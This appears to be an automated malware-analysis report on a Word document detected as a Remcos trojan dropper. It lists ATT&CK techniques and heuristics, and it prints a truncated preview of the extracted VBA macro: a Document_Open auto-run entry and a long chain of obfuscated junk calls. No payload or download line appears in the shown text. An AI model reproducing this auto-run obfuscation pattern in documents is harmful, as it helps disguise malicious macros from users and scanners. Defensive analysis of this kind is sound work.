MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro utilizes the Shell() function, indicating an attempt to execute external code. The ClamAV detection name 'Win.Trojan.Remcos-6656024-0' strongly suggests the malware family and its malicious intent. The macro likely downloads and executes a second-stage payload, consistent with common trojan behavior.
Heuristics 6
-
ClamAV: Win.Trojan.Remcos-6656024-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Remcos-6656024-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 348786 bytes |
SHA-256: ae1bb7c384256023986b425f20493b5ae97471899ca00eb00a55083e14947642 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.file2" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Option Explicit Sub dOcUmeNT_OpEN(): Call ltknbhsbibalnxj: End Sub Sub ltknbhsbibalnxj() Call dahgvoekhyeivmg End Sub Private Sub dahgvoekhyeivmg() Call alchoseygumndob End Sub Private Function alchoseygumndob() As Currency Call kutyxiljlqxybys End Function Static Function kutyxiljlqxybys() As String Call rwdopbuhaojodlc End Function Function rwdopbuhaojodlc() As Currency Call sgodnawukkbmrpn End Function Sub sgodnawukkbmrpn() Call qjtrucauehuqixs End Sub Private Function qjtrucauehuqixs() As Single Call ivyehkxjtdsbmwx End Function Private Function ivyehkxjtdsbmwx() As Integer Call xzwqdvvmsasstzw End Function Function xzwqdvvmsasstzw() As Object Call zbrsqtclxyvpqkq End Function Function zbrsqtclxyvpqkq() As Single Call fhkcbnvqbubtnhj End Function Private Sub fhkcbnvqbubtnhj() Call fvdkrmikaqnewvc End Sub Static Function fvdkrmikaqnewvc() As Variant Call dcqrrpxrknbvjnp End Function Sub dcqrrpxrknbvjnp() Call nhyphetvzkrtmnx End Sub Function nhyphetvzkrtmnx() As Single Call cpfuwqdeoglxpze End Function Static Sub cpfuwqdeoglxpze() Call xsponusfqqaergo End Sub Static Sub xsponusfqqaergo() Call uzcwnxhmannvexb End Sub Static Function uzcwnxhmannvexb() As Date Call fekuendqpkesgxj End Function Sub fekuendqpkesgxj() Call tmrzsynaehyxjkq End Sub Private Sub tmrzsynaehyxjkq() Call vtuuyxegydvhbet End Sub Private Sub vtuuyxegydvhbet() Call usqpmyxzdbuxxdp End Sub Static Sub usqpmyxzdbuxxdp() Call mznigfjhcyyvfsm End Sub Function mznigfjhcyyvfsm() As String Call jkijzjjwbufaoth End Function Private Function jkijzjjwbufaoth() As Byte Call ttzaizqggqqkldy End Function Static Function ttzaizqggqqkldy() As Byte Call avjraszevocbnri End Function Static Sub avjraszevocbnri() Call bfugyrbrekuzbvt End Sub Sub bfugyrbrekuzbvt() Call yizuftfrzhndsdy End Sub Private Function yizuftfrzhndsdy() As Variant Call rtegsbchndlowcd End Function Static Function rtegsbchndlowcd() As Double Call gxcsomajnalfdeb End Function Static Function gxcsomajnalfdeb() Call iaxubkhiryocapw End Function Private Function iaxubkhiryocapw() As Variant Call ofqemeanwvvgxmp End Function Static Sub ofqemeanwvvgxmp() Call oujmcdnivqhrgai End Sub Private Sub oujmcdnivqhrgai() Call mawucgcpfnuitsv End Sub Sub mawucgcpfnuitsv() Call wfertvytukkgwsd End Sub Private Function wfertvytukkgwsd() As Variant Call kolxhhicjgfkzek End Function Private Sub kolxhhicjgfkzek() Call muosnfziddcurzn End Sub Private Sub muosnfziddcurzn() Call eigfmogisdyjqpf End Sub Static Sub eigfmogisdyjqpf() Call xqdygvsrszchyec End Sub Function xqdygvsrszchyec() As Object Call tbyzzzsfrvkmhfx End Function Function tbyzzzsfrvkmhfx() As Long Call dkoqipzqvsvwfpo End Function Private Sub dkoqipzqvsvwfpo() Call klzgaiiolphngdy End Sub Static Sub klzgaiiolphngdy() Call lvkvyhkbulyluhj End Sub Static Sub lvkvyhkbulyluhj() Call jyojfjobojrplpo End Sub Static Sub jyojfjobojrplpo() Call bktwsrlqdfqapot End Sub Sub bktwsrlqdfqapot() Call qosiocktdcqqwqr End Sub Static Function qosiocktdcqqwqr() As Date Call srnkbaqshzsotbm End Function Static Function srnkbaqshzsotbm() As Boolean Call ywfumukxmwzsqyf End Function Sub ywfumukxmwzsqyf() Call zkycctxrlsldzmy End Sub Private Sub zkycctxrlsldzmy() Call wrljcwlyvoyunek End Sub Private Function wrljcwlyvoyunek() As Variant Call gwuhslicklprpet End Function Static Sub gwuhslicklprpet() Call vebmhxrmzijwsqa End Sub Sub vebmhxrmzijwsqa() Call wldimvistfggkld End Sub Sub wldimvistfggkld() Call vkadbxblydfwgjz End Sub Private Sub vkadbxblydfwgjz() Call orxwventxzjuoyw End Sub Static Function orxwventxzjuoyw() As Byte Call kcsxoinhwvrzxar End Function Function kcsxoinhwvrzxar() Call naegifizltziybd End Function Sub naegifizltziybd() ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.